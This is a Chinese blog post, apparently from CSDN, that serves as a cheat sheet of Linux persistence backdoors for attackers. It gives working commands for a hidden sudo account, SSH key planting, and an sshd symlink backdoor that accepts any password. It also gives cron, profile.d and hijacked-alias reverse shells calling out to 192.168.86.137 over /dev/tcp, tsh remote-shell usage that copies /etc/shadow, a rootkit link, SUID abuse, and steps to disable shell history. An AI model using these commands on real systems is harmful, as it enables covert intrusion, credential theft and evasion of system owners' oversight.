Linux 权限维持

于 2024-08-21 09:56:25 发布
阅读量53 收藏
点赞数 1
分类专栏: 网络安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44268185/article/details/141365508
版权

Linux 权限维持

添加后门账号

sudo useradd-M 用户名 && sudo passwd 用户名 # 创建用户并设置用户名
# 用户可通过sodu+密码获取root权限
sudo visudo
添加
用户名 ALL=(ALL:ALL) ALL

# 验证用户是否可以ssh登录
#添加ssh登录权限
vim /etc/ssh/sshd_config
# 添加 AllowUsers user
sudo systemctl restart ssh # 重启ssh服务

ssh公私钥后门

ssh-keygen -t rsa -b 4096 -C "你的邮箱地址" # 创建公私钥
cat ~/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys # 将公钥添加生效
ssh -i ~/.ssh/my_custom_key 用户名@服务器IP # ssh登录指定私钥文件

ssh软连接

cat /etc/ssh/sshd_config | grep UsePAM
ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=8888
ssh root@xx.xx.xx.xx -p 8888 任意密码登录即可
(echo "* * * * * ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=8888") | crontab - # 添加计划任务免得被kill

计划任务后门

echo "#!/bin/bash" > /tmp/.demo.sh
echo "sh -i >& /dev/tcp/192.168.86.137/3434 0>&1" > /tmp/.demo.sh
chmod +x /tmp/.demo.sh
(echo "*/1 * * * * /tmp/.demo.sh") | crontab -
# 利用现有计划任务更不易发现

alias后门

echo "alias ls='alerts(){ ls $* --color=auto;bash -i >& /dev/tcp/192.168.86.137/3333 0>&1; };alerts'" >> ~/.bashrc

开机启动项

echo "#!/bin/bash" > /etc/profile.d/.demo.sh
echo "echo "sh -i >& /dev/tcp/192.168.86.137/3434 0>&1" >> /etc/profile.d/.demo.sh
chmod +x /etc/profile.d/.demo.sh
# 利用现有开机启动项更不容易发现

tsh权限维持

https://github.com/creaktive/tsh
# 编译
make <system> 如make linux
# server
umask 077; HOME=/var/tmp ./tshd
# client
 - start a shell:
   ./tsh <hostname>
 - execute a command:
   ./tsh <hostname> "uname -a"
 - transfer files:
   ./tsh <hostname> get /etc/shadow .
   ./tsh <hostname> put vmlinuz /boot

rootkit权限维持

https://github.com/f0rb1dd3n/Reptile/

suid/sgid/sudo权限维持

chmod u+s python
chmod g+s python
sudo visudo
添加
用户名 ALL=(ALL:ALL) ALL

history不记录执行命令

unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0

或执行命令前加一个空格
如ls变成 ls(注意是空ls)

其他的后门维持手段

OpenSSH后门万能密码&记录密码
PAM后门
Strace后门
xz投毒后门
K-D小昊
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Linux权限维持
2403_82795493的博客
02-26 667
在攻击者利用漏洞获取到某台机器的控制权限之后,会考虑将该机器作为一个持久化的据点,种植一个具备持久化的后门,从而随时可以连接该被控机器进行深入渗透。
linux权限维持
qq_44704184的博客
07-08 2147
linux权限维持
Linux 权限维持手法
qq_53742230的博客
07-21 2174
Linux 权限维持手法
LINUX权限维持
m0_65096687的博客
06-24 641
添加超级用户的方式有很多种,这里直接拿到root权限后创建一个用户,在/etc/passwd/中修改用户id值为0。Linux提权操作中有个suid提权。在对方主机中查看是否又以下文件·第一个星号是分钟,这里没有加就是过一会就执行。得到对方主机权限后,在目录中写入命令执行脚本。然后就可以利用suid提权来权限维持。拿到对方的root权限后,关闭防火墙。把这些文件加上SUID。然后攻击机开启nc监听。然后在计划任务中配置。
Linux权限维持—后门篇
good good study
04-18 3745
Rootkit是一种特殊的恶意软件,它的功能是在安装目标上隐藏自身及指定的文件、进程和网络链接等信息,比较多见到的是Rootkit一般都和木马、后门等其他恶意程序结合使用。 rootkit是linux平台下最常见的一种木马后门工具,它主要是通过替换系统文件来达到入侵和隐藏的目的。rootkit主要分为文件级别的和内核级别的
玄机——第三章 权限维持-linux权限维持-隐藏 wp
焦虑的焦虑
07-03 2597
第三章 权限维持-linux权限维持-隐藏
【应急响应】Linux权限维持 -隐藏权限
网络安全从业者的学习笔记
07-31 535
不知攻焉知守,学会排查就要先学习如何攻击。
【内网安全】——Linux权限维持
Demo不是emo的博客
02-26 4561
Linux常见的权限维持姿势
玄机靶场-第三章 权限维持-linux权限维持-隐藏
ljc13626678577的博客
07-04 1044
玄机靶场,第三章 权限维持-linux权限维持-隐藏题目,主要涉及到权限维持内容学习
Linux权限维持—隐藏踪迹篇
good good study
04-15 1891
攻击者在获取服务器权限后,会通过一些技巧来隐藏自己的踪迹和留下后门,本文介绍Linux下的几种隐藏技术。 端口复用是指不同的应用程序使用相同端口进行通讯。我们可以通过端口复用来达到隐藏端口的目的。其他作用还有很多,如内网渗透中,搭建隧道时,服务器仅允许指定的端口对外开放。利用端口复用可以将3389或22等端口转发到如80端口上,以便外部连接。...
linux权限维持.pdf
03-31
Linux权限维持是信息安全领域内一个关键的话题,特别是在对Linux系统进行入侵测试或实际遭受攻击后,保持对系统的访问权限是一个常见需求。以下是关于Linux权限维持的详细介绍: 首先,Linux系统权限维持的方法通常...
[总结]Linux权限维持1
08-03
1.[总结]SQL注总结 3.[后渗透]多姿势绕过 Powershell 调保护 5.[总结]加载 DLL 的多种式 7.[逆向]PE件格式解析 3. [WEB
linux suid权限维持速查表1
08-03
这篇速查表主要列举了多种利用SUID权限维持的方法,这些方法大多涉及通过不同的命令或者脚本启动一个shell,以获得root权限。以下是一些示例: 1. `chmod u+s program`: 这个命令将SUID权限赋予名为`program`的文件...
linux源码分析
10-11
### Linux源码分析——安全与防御视角 #### 一、概述 Linux作为一款开源操作系统,因其高度的灵活性和稳定性而受到广泛欢迎。然而,这也使其成为黑客和...此外,定期备份和更新系统也是维持系统安全的关键措施之一。
特洛伊木马:现代网络安全的隐形威胁
weixin_48579910的博客
08-16 620
特洛伊木马是一种伪装成合法软件或文件的恶意程序。攻击者利用这种伪装,使受害者在不知情的情况下主动安装或运行木马,从而为攻击者打开了进入目标系统的大门。与病毒不同,木马并不会自我复制,而是通过社会工程学等手段诱使用户下载和执行。特洛伊木马虽然是网络世界中的“老兵”,但其隐蔽性和多样性使得它至今仍然是网络安全的一大威胁。了解木马的工作原理和危害,并采取适当的防范措施,可以帮助我们在数字化生活中更加安全地航行。
【办公软件】安全风险 Microsoft 已阻止宏运行,因为此文件的来源不受信任
最新发布
一点硬件
08-20 130
安全风险 Microsoft 已阻止宏运行 因为此文件的来源不受信任
《向量数据库指南》——解决方案:采用安全、高性能的Milvus Cloud向量数据库,赋能Dopple AI的创新与发展
LCHub低代码社区
08-15 47
面对不断涌现的新模型和技术的快速演变,Sam和他的团队需要付出巨大的努力来保持竞争力。在未来的日子里,随着Dopple AI业务的不断壮大和技术的持续演进,我们有理由相信,Zilliz Cloud将继续发挥其关键作用,为Dopple AI的成功之路提供坚实的支撑。此外,Zilliz Cloud还提供了丰富的API和灵活的数据管理工具,使得Dopple AI的团队能够更加便捷地进行数据操作和应用开发。Zilliz Cloud作为一款全托管的向量数据库服务,不仅提供了出色的性能和安全性,还具备真正的扩展能力。
如何选择较为安全的第三方依赖版本?
极客星云-CSDN博客
08-16 125
本篇博文分享如何选择较为安全的第三方依赖版本的方法。
Linux权限维持有哪些方法
04-29
Linux权限维持的方法有很多,其中一些常见的方法包括: 1. 提权攻击:攻击者利用系统中存在的漏洞获取root权限。 2. 密码猜测:攻击者通过猜测密码来获取用户的权限。 3. 社会工程学攻击:攻击者通过欺骗用户来获取用户的权限,例如伪装成管理员向用户索取密码或其他敏感信息。 4. 后门攻击:攻击者在系统中植入后门程序,以便在以后可以随时获取权限。 5. 特权提升攻击:攻击者利用系统中的漏洞或配置错误,将自己的权限提升到更高的级别。 为了防止权限维持攻击,可以采取以下措施: 1. 及时升级系统和软件,修补漏洞。 2. 确保所有用户和管理员都使用强密码,并定期更换密码。 3. 加强身份验证和授权控制。 4. 使用安全的文件权限和访问控制策略。 5. 定期审查系统日志,以便及时发现异常行为。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值